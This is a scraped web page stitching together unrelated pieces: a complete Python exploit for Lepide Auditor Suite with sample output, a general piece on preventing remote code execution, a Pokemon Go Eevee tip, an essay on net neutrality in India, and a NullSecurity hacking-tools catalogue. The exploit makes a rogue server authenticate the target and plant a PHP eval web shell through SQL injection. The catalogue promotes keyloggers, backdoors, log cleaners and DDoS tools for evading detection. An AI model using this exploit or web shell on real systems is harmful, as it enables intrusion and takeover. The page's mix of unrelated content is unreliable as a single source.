Lepide Auditor Suite Remote Code Execution

 

#!/usr/bin/python
“””
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/

Summary:
========

The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.

Additional code:
================

When I wrote this poc, I didn’t combine the server and client into a single poc. So below is the client-poc.py code:

root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys

if len(sys.argv) < 3:
print “(+) usage: %s <target> <attacker’s server>” % sys.argv[0]
sys.exit(-1)

target = sys.argv[1]
server = sys.argv[2]

s = requests.Session()
print “(+) sending auth bypass”
s.post(‘http://%s:7778/&#8217; % target, data = {‘servername’:server, ‘username’:’whateva’,’password’:’thisisajoke!’,’submit’:”}, allow_redirects=False)
print “(+) sending code execution request”
s.get(‘http://%s:7778/genratereports.php&#8217; % target, params = {‘path’:’lol’,’daterange’:’2@3′,’id’:’6′})

Example:
========

root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016

(+) waiting for the target…
(+) connected by (‘172.16.175.174’, 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by (‘172.16.175.174’, 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 – 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();

In another console:

root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
“””
import struct
import socket
from thread import start_new_thread
import struct

LOGIN = 601
COLUMN = 604
FILENAME = 603

VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = “_SUCCESS_”

def get_string(conn):
size = struct.unpack(“>i”, conn.recv(4))[0]
data = conn.recv(size).decode(“utf-16”)
conn.send(struct.pack(“>i”, VALID))
return data

def send_string(conn, string):
size = len(string.encode(“utf-16-le”))
conn.send(struct.pack(“>i”, size))
conn.send(string.encode(“utf-16-le”))
return struct.unpack(“>i”, conn.recv(4))[0]

def send_tag(conn, tag):
conn.send(struct.pack(“>i”, TAGR))
conn.send(struct.pack(“>i”, tag))
return struct.unpack(“>i”, conn.recv(4))[0]

def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print “(+) successfully sent tag”

# send length of file
conn.send(struct.pack(“>i”, len(filedata.encode(“utf-16-le”))))

# send the malicious payload
conn.send(filedata.encode(“utf-16-le”))
if struct.unpack(“>i”, conn.recv(4))[0] == 2:
print “(+) successfully sent file!”
if send_tag(conn, VALID) == 2:
return True
return False

def client_thread(conn):
“””
Let’s put it this way, my mum’s not proud of my code.
“””
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(“>i”, data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(“>i”, code)[0]

# stage 1
if resp == LOGIN:
print “(+) got a login request”

# send a VALID response back
conn.send(struct.pack(“>i”, VALID))

# now we expect to get the username and password
print “(+) got a username: %s” % get_string(conn)
print “(+) got a password: %s” % get_string(conn)

# now we try to send to send a success packet
print “(+) sending SUCCESS packet”
if send_string(conn, SUCCESS) == 2:
print “(+) send string successful”

# stage 2
elif resp == COLUMN:
print “(+) got a column request”

# send a VALID response back
conn.send(struct.pack(“>i”, VALID))
print “(+) got http request id: %s” % get_string(conn)
print “(+) got http request path: %s” % get_string(conn)
if send_string(conn, “foo-bar”) == 2:
print “(+) send string successful”

# stage 3 – this is where the exploitation is
elif resp == FILENAME:
print “(+) got a filename request”
conn.send(struct.pack(“>i”, VALID))

# now we read back 3 strings…
print “(+) got http request daterange: %s” % get_string(conn)
print “(+) got http request id: %s” % get_string(conn)
print “(+) got http request path: %s” % get_string(conn)

# exploit!
if send_file(conn, “select ‘<?php eval($_GET[e]); ?>’ into outfile ‘../../www/offsec.php’;”):
print “(+) file sent successfully”
print “(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();” % (addr[0])
break
conn.close()

HOST = ‘0.0.0.0’
PORT = 1056

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)

print “Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution”
print “by mr_me 2016\t\n”
print “(+) waiting for the target…”
while True:

# blocking call, waits to accept a connection
conn, addr = s.accept()
print ‘(+) connected by %s’ % addr
start_new_thread(client_thread, (conn,))
s.close()

Remote Code Execution attacks and Prevention steps

It’s common for modern browser exploits to attempt to transform a memory safety vulnerability into a method of running arbitrary native code on a target device. This technique is most preferred since it allows the attackers to accomplish their means with least resistance.
Steps to safeguard from Remote Code Execution
Microsoft has been fighting against the problem of web browser vulnerabilities by laying out a systematic approach that aims at eliminating the entire class of vulnerabilities. The first step is to think like a hacker and try to deduce the steps that have been used to exploit the vulnerabilities. This gives more control to us and will also help us shield the attack in a better way. The classes of vulnerability are eliminated by reducing attack surface and by detecting specific mitigation patterns.
Break the Techniques and Contain damage
As we explained earlier in order to combat the attackers one needs to think like a hacker and try to deduce his techniques. That said it is safe to presume that we won’t be able to break all of the techniques and the next step is to contain damage on a device once the vulnerability is exploited.
This time around the tactics can be directed at the attack surface which is accessible from code which is running within Microsoft Edge’s browser sandbox. A Sandbox is a secure environment in which the apps can be tested.
Limit the windows of opportunity
Now, this is sort of a contingency plan considering that all the other methods have failed one needs to limit the window of opportunity for the attackers by using powerful and efficient tools. One can also report the incident at Microsoft Security Response Center and can use other technologies including Windows Defender and SmartScreen which are usually effective in blocking malicious URLs. CIG and ACG together prove to be extremely effective in handling the exploits. What this means is that hackers should now devise new ways which can circumvent the layer of security provided by CIG and ACG.
Arbitrary Code Guard & Code Integrity Guard
Microsoft battles the exploits with ACG (Arbitrary Code Guard) and CIG (Code Integrity Guard) both of which help combat the loading of malicious code into memory. Microsoft Edge is already using the technologies like ACG and CIG to avoid hacking attempts

In case you are a developer, there are many ways in which you can safeguard your code against such exploits. Ensure that your code adheres to the bounds of data buffers and also ensure that you don’t trust the users when it comes to giving out their data. Always try to assume the worst case scenario and build the program such that it can handle it, in other words, it’s always better to be a defensive programmer.

How to Get Umbreon in Pokemon Go

Eevee is one of the most interesting Pokemon characters. Not only is it ridiculously cute, but it doesn’t have a defined evolution path – and some of the Eevee evolutions have been the best Pokemon to take into a battle – like Vaporeon.

With the release of the second-gen Pokemon hitting Pokemon Go, you’ll be looking to unleash some of those new characters, namely Espeon and Umbreon.

If you were smart, you’d have been collecting Eevee all though the quiet Pokemon Go months so you’ll have plenty of candy and you can basically evolve straight away to bag yourself these new characters.

Here’s all you have to do:

1. Open up your Pokemon collection and find an Eevee that’s spare
2. Change the name from Eevee to Sakura (for Espeon) or Tamao (for Umbreon), by tapping the pencil next to that character’s name
3. Hit the evolve button and your Eevee will change into Umbreon or Espeon

If you don’t change the name, the Eevee will evolve into any of the forms that are available in Pokemon Go: Vaporeon, Jolteon, Flareon, Umbreon and Espeon.

But what are these names you have to change? They are the names of the Pokemon owners, dug out from Pokelore. So, for example, Espeon was Sakura’s, and one of her older sisters is Tamao, who owned Umbreon.

The original Eevee evolutions – Sparky, Rainer and Pyro – that you’ll need to control evolution to Jolteon, Vaporeon and Flareon respectively, again come from the Eevee brothers in Pokemon anime.

Threat to Net Neutrality in India

Net neutrality is the principle that Internet service providers and governments should treat all data on the Internet equally, not discriminating or charging differentially by user, content, site, platform, application, type of attached equipment, or mode of communication.

Net neutrality is an idea of openness and freedom to the consumer. Its origin lies in how telephone lines have worked and evolved since the start of the 20^th century. For example, you dial a number from your telephone; your service provider cannot control or manipulate who you are calling. It just cannot discriminate if you are calling for milk or some other person for wine. Its job is to keep the network up and running—that’s what you are paying for. Most of the countries have laws in place that safeguard with the European Union considering a shift in its policy towards net neutrality. India is trying to follow suit.

The basic structure of the internet is simply being connected. This connection is multifarious and extensive. It has since been growing manifold and has been sought to be controlled and manipulated by governments. They can succeed to some extent with the resources available to them but internet is a thing that cannot be fully controlled by anyway. Not even the “great firewall” of China. Even this can be sidestepped easily. Anyway, with the internet taking flight in 1980s and 1990s telecom operators were also ISPs, they adhered to the practice of connecting calls without discrimination. An ISP won’t manipulate the traffic that passes its servers. There also cannot be discrimination of speed when a user connects to a web service. Theoretically, data rate for Youtube videos and Facebook photos is same. The idea is that the end user can access any web service without any manipulation by the ISP.

There are no laws enforcing net neutrality in India. Although TRAI guidelines for the Unified Access Service license promotes net neutrality, it does not enforce it. The Information Technology Act, 2000 also does not prohibit companies from throttling their service in accordance with their business interests. Telecom operators and ISPs offering VoIP services have to pay a part of their revenues to the government. On 27 March 2015, TRAI released a consultation paper on over-the-top services (OTT) and net neutrality for public feedback. The regulator asked if telecom companies should be able to charge users extra fees for services like YouTube, WhatsApp and Skype on top of the fees people already pay for access to the Internet. The Communication and Information Technology Minister, Ravi Shankar Prasad, said on 7 April that a committee will be formed to study the net neutrality issue.

The Internet has become an indispensable part of our lives and we easily imagine that it is going to remain free and an open platform of communication that it is right now. It needs to be a network where we can always access any lawful content we want. The companies that deliver internet service need to be roped in by the government and these companies cannot play favourites just because they want to charge more money.

Take A gift: Basic Hacking Tools

Category	Description
[ Automation ]	Automation tools and wrapper scripts
[ Backdoor ]	Backdoors and rootkits for kernel, userland, network, hardware and software
[ Binary ]	ELF and PE Binary related tools
[ Cracker ]	Cracker for network and software login masks
[ Cryptography ]	Tools and any proof of concepts related to cryptography
[ DoS ]	Tools and any proof of concepts related to (distributed) Denial of Service
[ Exploit ]	Proof of concepts or fully working exploits for anything
[ Fuzzer ]	Fuzzing tools and proof of concepts for network protocols and software
[ Keylogger ]	Keyloggers for any kind of software and operating system
[ Logcleaner ]	Logfile cleaner for any kind of applications and operating systems
[ Misc ]	Miscellaneous stuff for anything.
[ Reversing ]	Any kind of tools related reverse engineering.
[ Scanner ]	Scanning tools for any network protocols, system and software
[ Shellcode ]	Shellcodes written for various operating systems and architecture
[ Wireless ]	Wireless related security and hacking tools

Collection of security and hacking tools

## Blackbox vulnerability scanne for the concrete5 CMS
## Detects concrete5 CMS, version and associated vulnerabilities
## Detects full path disclosure vulnerabilities
## Enumerates CMS users
## Brute-fores user account credentials

This section offers a selection of our fully featured security and hacking tools fromNullSecurity.
+ Automation :
This section includes automation tools and wrapper scripts for well-known and public security tools to make your life easier. You can adjust the scripts fast and easily according to your own needs. Mostly written in bourne shell.
+ Backdoor :
Backdoors and rootkits for kernel and userland, network, hardware and software. Once you have gone through all the hard work making sure you can get on the system. Make sure you can always get back in.
+ Binary :
ELF and PE binary related tools. This section includes packers, runtime crypters, including our famous (thanks trusted sec team) hyperion tool from our very own belial and other stuff.
+ Cracker :
Tools for cracking network and software login masks. Not been able to find an exploit to give you RCE? Too lazy to SE? So go smash down the front doors and rummage around with our cracking and brute force tools.
+ Cryptography :
Encrypt all the things! With privacy issues moving up most people agenda with items like PRISM in the news cryptography it one of todays hot topics. It’s also pretty useful for exfiltrating data from your target environment, connecting to that C2 box and keeping your loot away from prying eyes.
+ DDoS :
(D)DoS tools if you wanna by like those n00bs at anonymous or simulate everyones favourite underground extortionists.
+ Exploit :
Proof of Concept tools and, if we are feeling particularly generous, fully working exploits because there is nothing more fun that RCE, except dinner with noptrix of course.
+ Fuzzer :
Didn’t find the exploit you wanted in our exploit section well try one of our fuzzers and write you own god damn code.
+ Keylogger :
When you really need to know those credentials you keep seeing the user enter or are too lazy to go searching for every new piece of useful information just try one of our keyloggers and get the user to do the hard work for you!
+ LogCleaner :
Just because our mothers raised us right, we always clean up after ourselves and pwnage is no exception. These logcleaners also help in not getting caught on that important engagement.
+ Misc :
This section includes miscellanous files. Often, you will find non-security related stuff here.
+ Resersing :
Whether figuring out how that new piece of malware you just discovered works or hunting for the next 0day from $vendor, our reversing toolz will help you on your way.
+ Scanner
Can’t find any useful hints on shodan? Google dorks not dishing up the goods? Hell get one of our scanners out and track down your targets in 2 shakes of a lol-cat’s tail.
+ Shellcode
Just because our fuzzer worked or the PoC was fantastic doesn’t mean that running calc is gonna put a smile on your face. If you got RCE try our shellcodes to actually do something useful.
+ Wireless
Why wireless? It works and you don’t have to wear your favorite nullsecurity hoody to hide you face from the camera in reception. Hack all the thingz!

Downlaod : Master.zip  | Clone Url
Source : http://nullsecurity.net/loop